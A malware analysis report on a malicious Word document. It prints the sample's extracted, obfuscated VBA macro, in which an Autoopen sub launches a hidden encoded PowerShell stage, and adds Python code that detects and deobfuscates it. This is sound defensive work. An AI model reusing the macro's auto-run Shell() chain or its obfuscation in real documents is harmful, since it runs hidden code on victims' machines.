Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0da2937ce8a3abe5…

MALICIOUS

Office (OLE)

Size: 116.0 KB
Created: 2018-06-08 06:54:00
Authoring application: Microsoft Office Word
First seen: 2018-09-04
MD5: 74b7937d9dde45f0074f84a9b498f78a
SHA-1: 1277e5b4de10821cd4639c7b7d8432c63eef80bf
SHA-256: 0da2937ce8a3abe5aea37dd08b2e0d20e384dfa9fbdaa322cd65c554bbfe245f
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Word document (OLE container) carrying VBA macros. The Autoopen sub runs when the document is opened and calls the YoJHG function, which hands an obfuscated command string to Shell() with window style 15298 - 15298 = 0 (vbHide), so the spawned process shows no window. The string is assembled at run time: Chr(krzbpA + vbKeyP + lqJOzQ), in which only vbKeyP (80) is defined and the never-assigned Variants are Empty (0), yields "P"; the literal "owers" follows; and vavKf and uzlGj return "HeLL -e " plus base64 fragments, so the command has the form PowersHeLL -e <base64>. Decoded as UTF-16LE, the fragments visible in the extracted source read ( new-ObjECt sySTem.io.cOMPrESSION.dEFLAtEsTreAm( [sYSTem.Io.mEmOrystreaM] [COnvErt]::froMbaSe64stRInG('..., a PowerShell stub that inflates a deflate-compressed second-stage script. This is consistent with the ClamAV name Doc.Malware.Powload-7012660-0, which ClamAV applies to documents that stage malware through PowerShell. The nested For/Next loops doing arithmetic on unassigned variables are junk code, kept from raising by On Error Resume Next. The Autoopen-to-Shell() chain and the PowerShell payload are the primary evidence; the legacy WordBasic auto-exec marker is only corroboration.

Heuristics (7)

  • ClamAV: Doc.Malware.Powload-7012660-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-7012660-0
  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic rule text does not fully fit this sample: a VBA project was recovered (macros.bas below), so the finding only adds that the old AutoOpen marker is present as well.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace URI that any document containing drawing markup carries; it is not fetched at run time and is not an indicator on its own.
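The OLE_VBA_* findings above key on one thing: an auto-execution entry point occurring together with an execution primitive, with the string-splitting seen in the extracted source as a secondary tell. The Python below is an added example written for this page, not the analysis engine's own rule code. It runs that logic over an excerpt copied from macros.bas (shown further down) and over a constructed benign AutoOpen macro; the token lists, the fragment threshold and the benign control are assumptions made for the example.

```python
import re

# Entry points Word/Excel run without a click (what OLE_VBA_AUTOOPEN keys on).
AUTOEXEC = re.compile(
    r"\b(Auto_?Open|Auto_?Close|Auto_?Exec|AutoNew|Document_Open|Document_Close|"
    r"Workbook_Open|Workbook_Activate)\b", re.I)
# Primitives that launch code or fetch content (OLE_VBA_SHELL and friends).
EXEC_TOKENS = re.compile(
    r"\b(ShellExecute|Shell|WScript\.Shell|CreateObject|GetObject|URLDownloadToFile|"
    r"XMLHTTP|WinHttp|ADODB\.Stream)\b", re.I)
LITERAL = re.compile(r'"(?:[^"]|"")*"')
SEVERITY = {"none": 0, "medium": 1, "high": 2, "critical": 3}

def strip_comment(line):
    """Cut a trailing ' comment, but not an apostrophe inside a string literal."""
    quoted = False
    for i, ch in enumerate(line):
        if ch == '"':
            quoted = not quoted
        elif ch == "'" and not quoted:
            return line[:i]
    return line

def scan_vba(source):
    """Return (severity, message) findings for one VBA module's source text."""
    lines = [strip_comment(l) for l in source.splitlines()]
    code_only = "\n".join(LITERAL.sub('""', l) for l in lines)   # identifiers only
    literals = [lit[1:-1] for l in lines for lit in LITERAL.findall(l)]
    findings = []
    auto = sorted({m.group(1) for m in AUTOEXEC.finditer(code_only)}, key=str.lower)
    execs = sorted({m.group(1) for m in EXEC_TOKENS.finditer(code_only)}, key=str.lower)
    if auto:
        findings.append(("high", "auto-exec entry point: " + ", ".join(auto)))
    if execs:
        findings.append(("critical", "execution primitive: " + ", ".join(execs)))
    if auto and execs:
        findings.append(("critical", "auto-exec together with execution primitive"))
    # Obfuscation tell: several literals on one line, i.e. one string split into fragments.
    fragments = sum(n - 1 for n in (len(LITERAL.findall(l)) for l in lines) if n > 1)
    if fragments >= 8:
        findings.append(("medium", f"{fragments} string fragments concatenated"))
    # Plain-text tells. The excerpt below never holds "powershell" as one literal,
    # which is exactly why the Shell()+auto-exec co-occurrence matters more.
    joined = "".join(literals).lower()
    for kw in ("powershell", "http://", "https://", "cmd.exe", "wscript"):
        if kw in joined:
            findings.append(("high", f"literal contains {kw!r}"))
    return findings

def verdict(findings):
    """Highest severity among the findings ('none' when there are none)."""
    return max((sev for sev, _ in findings), key=SEVERITY.get, default="none")

# Excerpt copied from macros.bas (junk loops and unrelated lines removed).
MACRO_EXCERPT = '''
Function YoJHG()
On Error Resume Next
YoJHG = PsiaFmV + Shell(GmJrLX + Chr(krzbpA + vbKeyP + lqJOzQ) + "owers" + vavKf + uzlGj + SjuitMHdW + mQPYDhtV + qEzEMku + zzkROT, 15298 - 15298)
End Function
Sub Autoopen()
On Error Resume Next
YoJHG
End Sub
UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe"
UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB"
zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA"
'''
# CONSTRUCTED benign control: an AutoOpen that only edits the header, with an
# apostrophe inside a literal to exercise the comment stripper.
BENIGN_CONSTRUCTED = '''
' constructed sample, not from the analysed file
Sub AutoOpen()
    ActiveDocument.Sections(1).Headers(1).Range.Text = "Draft ' do not distribute"
End Sub
'''

if __name__ == "__main__":
    for name, src in (("macros.bas excerpt", MACRO_EXCERPT), ("benign control", BENIGN_CONSTRUCTED)):
        found = scan_vba(src)
        print(f"{name}: verdict={verdict(found)}")
        for sev, msg in found:
            print(f"  [{sev}] {msg}")
```

The benign control still scores "high" on the auto-exec entry point alone, which mirrors the report's own AutoOpen finding; only the co-occurrence with Shell() lifts the excerpt to "critical". The keyword pass over literals finds nothing in the excerpt because "powershell" is never present as a whole literal, so token-only detection would miss this sample.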

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  13923 bytes
SHA-256: f595a0e6520d7b1e9ba602a6fa407416a7aacdce3bfcd984e422038fbc9a3213

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "nsjOpfSA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YoJHG()
On Error Resume Next
For cZpjS = wLfKGt To QrjfUz
      For sKHiA = itQds To 91085
         dVYGGN = (98926 / CBool(JVBuv) - qKHFp / Oct(75566 / Hex(73577) / SSKfF + Rnd(FuBSL / Fix(37))))
Next
   SvTdZ = 14792 - 96909
Next
For ioGkF = ojIYCI To MDFva
      For oNOTj = sEvrif To 64914
         jidMaa = (30569 / CBool(VmdPD) - FrNhzA / Oct(18272 / Hex(78461) / UWBMl + Rnd(rdtUTU / Fix(37))))
Next
   ZtVzrS = 84777 - 54228
Next
YoJHG = PsiaFmV + Shell(GmJrLX + Chr(krzbpA + vbKeyP + lqJOzQ) + "owers" + vavKf + uzlGj + SjuitMHdW + mQPYDhtV + qEzEMku + zzkROT, 15298 - 15298)
For TfuwDd = jhfuNI To YNiddI
      For ukdbSU = zIqws To 58576
         WSmpO = (62484 / CBool(nnaQQ) - zmNpO / Oct(37918 / Hex(12644) / vQXkI + Rnd(jYowVi / Fix(37))))
Next
   CurnPb = 44253 - 13567
Next
End Function
Sub Autoopen()
On Error Resume Next
For DKBRON = BiYXda To PEGuj
      For zcumR = rVBzrj To 35101
         MMjrXT = (56167 / CBool(PzGIbs) - iIhqsz / Oct(53031 / Hex(31789) / zTWZz + Rnd(joLbpC / Fix(37))))
Next
   OXMlM = 24167 - 94325
Next
YoJHG
For ISwtSq = sZClw To rDzDm
      For QSzADZ = tJiGk To 28871
         jrBXj = (63890 / CBool(WvlZEG) - XUPiZ / Oct(62341 / Hex(62230) / LSvTF + Rnd(AOTRWc / Fix(37))))
Next
   ACZWFn = 89199 - 43109
Next
End Sub


Attribute VB_Name = "bwTLWpOY"
Function vavKf()
On Error Resume Next
For dICLq = OZlvA To WfBBBr
      For NwmFD = PVciUv To 25666
         uhPhSZ = (37697 / CBool(dwdhSi) - fEbUk / Oct(51965 / Hex(24235) / DwUaCm + Rnd(QAmBbw / Fix(37))))
Next
   TiSwiS = 77685 - 52977
Next
UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe"
For YlNwi = bcTiqL To wwQwmh
      For uRCKsk = BowtCb To 53368
         pppMWZ = (20073 / CBool(tIbkjU) - hfGwcH / Oct(66209 / Hex(5890) / tBZnW + Rnd(njHCIb / Fix(37))))
Next
   aKDjj = 18080 - 3537
Next
UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB"
For zIjJP = vdzoH To lSVAWK
      For UrdhL = aFvus To 45133
         Bltss = (59232 / CBool(arGIO) - pVIpD / Oct(25538 / Hex(47682) / jaWbV + Rnd(oJAiG / Fix(37))))
Next
   ilAYc = 14205 - 84073
Next
zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA"
For fdlVS = OFwGr To wUULXR
      For ZSQrX = zTDVj To 24126
         VVZDpB = (16503 / CBool(qjMtr) - SNQoAL / Oct(69497 / Hex(34851) / OmOTVp + Rnd(jNtvJ / Fix(37))))
Next
   vRWWIL = 67732 - 67304
Next
nbcQzZujuK = "AWwBz" + "AFkAUwBUAGUA" + "bQAuAEkAbwAuAG" + "0A" + "RQBt" + "AE"
For zfbiG = jiALDk To QbhmV
      For zzzwQp = zSiDY To 67118
         Joisq = (67832 / CBool(DitjG) - kAvoVp / Oct(7223 / Hex(67781) / zjKpo + Rnd(NEznUj / Fix(37))))
Next
   cspwm = 14740 - 92735
Next
wmojz = "8AcgB5AHM" + "AdAByAGUAYQ" + "BNAF0AIABbAEMA" + "TwBuAHY"
For GMKwh = XqhifS To qwiBu
      For pavvmJ = YCzZDw To 75045
         rWAtGo = (81508 / CBool(PEpQw) - uHusXG / Oct(89380 / Hex(20519) / YnzaV + Rnd(IfjfSz / Fix(37))))
Next
   hInwzM = 61613 - 83594
Next
uzuNScm = "ARQByAHQAXQ" + "A6" + "ADoAZgB" + "yAG" + "8ATQ" + "BiAGE"
vavKf = UActTXViAj + UwYrkJRk + zFFtsvok + nbcQzZujuK + wmojz + uzuNScm
End Function
Function uzlGj()
On Error Resume Next
For sjnHri = YjqjF To FHNVWH
      For GlfmS = mEbHh To 58906
         buPnN = (99195 / CBool(UKwcSV) - Cjiiq / Oct(46841 / Hex(36368) / HEBoSs + Rnd(zZICj / Fix(37))))
Next
   LrZHW = 58467 - 7175
Next
LrqUMSv = "AUwBlADY" + "ANABzAHQAUgBJAG" + "4A" + "RwAoACcAVgB" + "aAEI" + "AdAB" + "TADgATQB3AEY" + "ASQBY" + "AC8AUwBqADQA" + "VQB1A"
For mDTzTk = sdrGG To mLmYhl
      For MZTQp = qoIWT To 88374
         uVBhr = (96941 / CBool(iEwQv) - PYjnj / Oct(79641 / Hex(86781) / jMjDHO + Rnd(jjGYMr / Fix(37))))
Next
   RKFjjd = 61468 - 15080
Next
... (truncated)
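The string building in the preview can be resolved mechanically rather than by hand. The Python below is an added example, not part of the report or of the sample: it parses the assignment lines copied from the preview, evaluates the VBA + concatenation (never-assigned Variants are Empty, so Chr(krzbpA + vbKeyP + lqJOzQ) is Chr(80) = "P" and 15298 - 15298 is 0, vbHide), decodes the -e argument as base64 over UTF-16LE, and shows the FromBase64String plus DeflateStream step that the decoded stub performs next. Two things are assumptions: the return statement of uzlGj lies past the truncation point, so its single visible literal (LrqUMSv) is taken as the function's value; and the inner stage is inflated from a constructed sample, because the real blob beginning VZBtS8MwFIX/ is cut off on this page.

```python
import base64
import re
import zlib

# Copied from macros.bas above (functions YoJHG, vavKf, uzlGj); the junk For/Next
# loops and arithmetic noise are left out because, under On Error Resume Next, they
# never touch the command string. Last line is an ASSUMPTION: uzlGj's return
# statement lies past the preview's truncation, so its one visible literal is used.
MACRO_LINES = r'''
YoJHG = PsiaFmV + Shell(GmJrLX + Chr(krzbpA + vbKeyP + lqJOzQ) + "owers" + vavKf + uzlGj + SjuitMHdW + mQPYDhtV + qEzEMku + zzkROT, 15298 - 15298)
UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe"
UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB"
zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA"
nbcQzZujuK = "AWwBz" + "AFkAUwBUAGUA" + "bQAuAEkAbwAuAG" + "0A" + "RQBt" + "AE"
wmojz = "8AcgB5AHM" + "AdAByAGUAYQ" + "BNAF0AIABbAEMA" + "TwBuAHY"
uzuNScm = "ARQByAHQAXQ" + "A6" + "ADoAZgB" + "yAG" + "8ATQ" + "BiAGE"
vavKf = UActTXViAj + UwYrkJRk + zFFtsvok + nbcQzZujuK + wmojz + uzuNScm
LrqUMSv = "AUwBlADY" + "ANABzAHQAUgBJAG" + "4A" + "RwAoACcAVgB" + "aAEI" + "AdAB" + "TADgATQB3AEY" + "ASQBY" + "AC8AUwBqADQA" + "VQB1A"
uzlGj = LrqUMSv
'''
VB_CONSTANTS = {"vbKeyP": 80}  # the only intrinsic constant the macro relies on
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus", 3: "vbMaximizedFocus"}

def split_top(expr, sep):
    """Split on sep, ignoring separators inside string literals or parentheses."""
    parts, cur, depth, quoted = [], "", 0, False
    for ch in expr:
        if ch == '"':
            quoted = not quoted
        elif not quoted and ch in "()":
            depth += 1 if ch == "(" else -1
        elif not quoted and ch == sep and depth == 0:
            parts.append(cur.strip())
            cur = ""
            continue
        cur += ch
    parts.append(cur.strip())
    return parts

def eval_int(expr):
    """+/- arithmetic over literals, vbKey constants and unassigned names (Empty = 0)."""
    total = 0
    for sign, tok in re.findall(r"([+-]?)\s*(\w+)", expr):
        value = int(tok) if tok.isdigit() else VB_CONSTANTS.get(tok, 0)
        total += -value if sign == "-" else value
    return total

def eval_concat(expr, env, depth=0):
    """Evaluate a VBA '+' concatenation of literals, Chr() calls and variables."""
    if depth > 50:
        raise RecursionError("circular assignment in macro source")
    out = []
    for term in split_top(expr, "+"):
        if term.startswith('"') and term.endswith('"'):
            out.append(term[1:-1].replace('""', '"'))
        elif term.lower().startswith("chr(") and term.endswith(")"):
            out.append(chr(eval_int(term[4:-1])))
        else:  # variable: follow its assignment, or Empty -> "" if never assigned
            out.append(eval_concat(env[term], env, depth + 1) if term in env else "")
    return "".join(out)

def parse_assignments(source):
    """Map each 'name = expression' line to its unevaluated right-hand side."""
    return dict(re.findall(r"^\s*(\w+)\s*=\s*(.+?)\s*$", source, flags=re.M))

def reconstruct_shell(source):
    """Return (command line, window style) handed to the macro's Shell() call."""
    env = parse_assignments(source)
    args = split_top(re.search(r"Shell\((.*)\)", source).group(1), ",")
    return eval_concat(args[0], env), eval_int(args[1])

def decode_encoded_command(command):
    """Decode the -e/-EncodedCommand argument (base64 over UTF-16LE). The preview is
    truncated, so an incomplete trailing base64 group and a dangling odd byte are dropped."""
    blob = re.split(r"\s-(?:e|ec|enc|encodedcommand)\s+", command, flags=re.I)[1].split()[0]
    raw = base64.b64decode(blob[: len(blob) - len(blob) % 4])
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")

def inflate_inner_stage(b64_blob):
    """What the decoded stub does next: FromBase64String, then DeflateStream(Decompress).
    .NET DeflateStream is raw deflate without a zlib header, hence wbits=-15."""
    return zlib.decompress(base64.b64decode(b64_blob), -15).decode("utf-8")

def build_constructed_inner_stage(script):
    """CONSTRUCTED input for inflate_inner_stage: the real inner blob ('VZBtS8MwFIX/...')
    is cut off in the preview and cannot be inflated from this page."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(script.encode()) + comp.flush()).decode()

if __name__ == "__main__":
    command, style = reconstruct_shell(MACRO_LINES)
    print(f"Shell() runs  : {command[:40]}...  window style {style} ({WINDOW_STYLES[style]})")
    print("decoded -e    :", decode_encoded_command(command))
    sample = build_constructed_inner_stage("Write-Host 'constructed second stage'")
    print("inner stage   :", inflate_inner_stage(sample))
```

Run as a script it prints the recovered command line (PowersHeLL -e KAAgAG4A...), the window style 0 (vbHide), and the decoded stub, which begins ( new-ObjECt  sySTem.io.cOMPrESSION.dEFLAtEsTreAm( [sYSTem.Io.mEmOrystreaM] [COnvErt]::froMbaSe64stRInG('VZBtS8MwFIX/Sj4U and breaks off where the preview does. With a complete macro, the base64 literal inside that stub would be passed to inflate_inner_stage to recover the second-stage script.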